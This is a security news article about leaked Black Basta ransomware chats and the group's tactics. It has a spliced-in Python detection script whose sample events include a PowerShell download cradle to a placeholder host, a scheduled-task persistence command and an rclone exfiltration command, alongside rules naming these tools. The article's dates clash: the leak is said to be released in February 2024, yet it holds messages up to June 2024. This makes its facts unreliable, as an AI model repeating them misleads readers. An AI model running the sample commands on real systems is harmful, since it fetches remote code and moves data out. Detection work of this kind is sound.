Cyber Security News

Black Basta’s Notorious Tactics and Techniques Exposed in Leaked Intel

A significant leak of internal chat logs from the Black Basta ransomware group has provided cybersecurity researchers with unprecedented insight into their operations, capabilities, and motivations.

The leak, released on February 11, 2024, by a Telegram user named ExploitWhispers, contained approximately 200,000 chat messages dated between September 2023 and June 2024.

This event rivals the 2022 leaks that affected the Conti ransomware gang, offering a rare glimpse into one of the most impactful ransomware groups of recent years.

Ransomware Group’s Operations Unveiled

Threat hunters at Intel 471 have updated their threat intelligence with newly uncovered Tactics, Techniques, and Procedures (TTPs) based on the leaked information.

These include reconnaissance via discovery tools, defense evasion through abuse of Windows components, credential access using Mimikatz, and command and control access via the AnyDesk application.

The group also employs PowerShell for file downloads and execution, utilizes Rclone for data exfiltration, and achieves persistence through scheduled task creation.

Advanced TTPs and Critical Infrastructure Targeting

Black Basta, a Russian-speaking group operating under the Ransomware-as-a-Service (RaaS) model, has targeted numerous countries worldwide, including the United States, Japan, Australia, and the United Kingdom.

A joint report from CISA and the FBI released on May 10, 2024, detailed the group’s major activities between April 2022 and May 2024, revealing that they had targeted over 500 entities across North America, Europe, and Australia, affecting 12 out of 16 critical infrastructure sectors.

The ransomware group’s modus operandi involves encrypting files on victims’ computers or networks and employing a double extortion tactic, threatening to publish exfiltrated data if the ransom is not paid.

Their initial access techniques typically include phishing emails with malicious attachments or links, compromised websites, and exploitation of known vulnerabilities.

Recently, a Black Basta affiliate has been observed sending overwhelming amounts of spam emails to victims, followed by phone calls posing as IT staff to trick users into downloading remote support tools.

Once access is gained, Black Basta operators conduct network scans and reconnaissance using tools like SoftPerfect (netscan.exe).

They employ BITSAdmin and PsExec for lateral movement and utilize Splashtop, ScreenConnect, and Cobalt Strike beacons to assist in their operations.

The group has been known to use Rclone and WinSCP for file exfiltration before encrypting data across local and network drives.
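The TTPs listed in this article (PowerShell download and execution, scheduled-task persistence, Rclone exfiltration, BITSAdmin and PsExec for lateral movement, netscan.exe for discovery, AnyDesk for command and control) are the kind of detail defenders turn into detection logic. The following is an added example, not tooling from the article, Intel 471 or CISA: a small Python pass over constructed Sysmon-style process-creation events; host names, paths and the URL are constructed placeholders.

```python
import re

# (technique label as described in the article, image basename regex, command-line regex)
# An empty command-line regex means any command line for that image is flagged.
RULES = [
    ("Persistence: scheduled task creation", r"^schtasks\.exe$", r"/create\b"),
    ("Execution: PowerShell download cradle", r"^powershell\.exe$",
     r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"),
    ("Exfiltration: Rclone", r"^rclone(\.exe)?$", r"\b(copy|sync|move)\b"),
    ("Lateral movement: BITSAdmin transfer", r"^bitsadmin\.exe$", r"/transfer\b"),
    ("Lateral movement: PsExec", r"^psexec(64)?\.exe$", r""),
    ("Discovery: SoftPerfect netscan", r"^netscan\.exe$", r""),
    ("C2 access: AnyDesk", r"^anydesk\.exe$", r""),
]

def match_event(image, cmdline):
    """Labels of every rule satisfied by one process-creation event.
    `image` is the full path as logged; only its basename is compared."""
    base = image.replace("\\", "/").rsplit("/", 1)[-1]
    return [label for label, img_re, cmd_re in RULES
            if re.search(img_re, base, re.I) and re.search(cmd_re, cmdline, re.I)]

def scan(events):
    """events: iterable of (host, image, cmdline). Returns {host: [technique, ...]}
    with duplicates dropped and techniques kept in first-seen order per host."""
    seen = {}
    for host, image, cmdline in events:
        for label in match_event(image, cmdline):
            hits = seen.setdefault(host, [])
            if label not in hits:
                hits.append(label)
    return seen

# Constructed sample events (not real telemetry); hosts, paths and URL are placeholders.
SAMPLE = [
    ("WS01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -c (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    ("WS01", r"C:\Windows\System32\schtasks.exe",
     r"schtasks /create /sc onlogon /tn Updater /tr C:\Users\Public\a.exe"),
    ("FS01", r"C:\Users\Public\rclone.exe", r"rclone copy D:\Shares remote:bucket --transfers 8"),
    ("FS01", r"C:\Windows\System32\notepad.exe", "notepad.exe report.txt"),
]

if __name__ == "__main__":
    for host, techniques in scan(SAMPLE).items():
        print(host, "->", "; ".join(techniques))
```

Grouping hits per host is what makes the pattern useful: a single PowerShell download is noise on many networks, but download cradle plus scheduled-task creation on one workstation and Rclone on a file server together match the chain the article describes.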

The exposure of Black Basta’s internal communications and operational details provides valuable intelligence for cybersecurity professionals and law enforcement agencies.

This information can be crucial in developing more effective defense strategies and mitigation techniques against this persistent and evolving ransomware threat.


Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
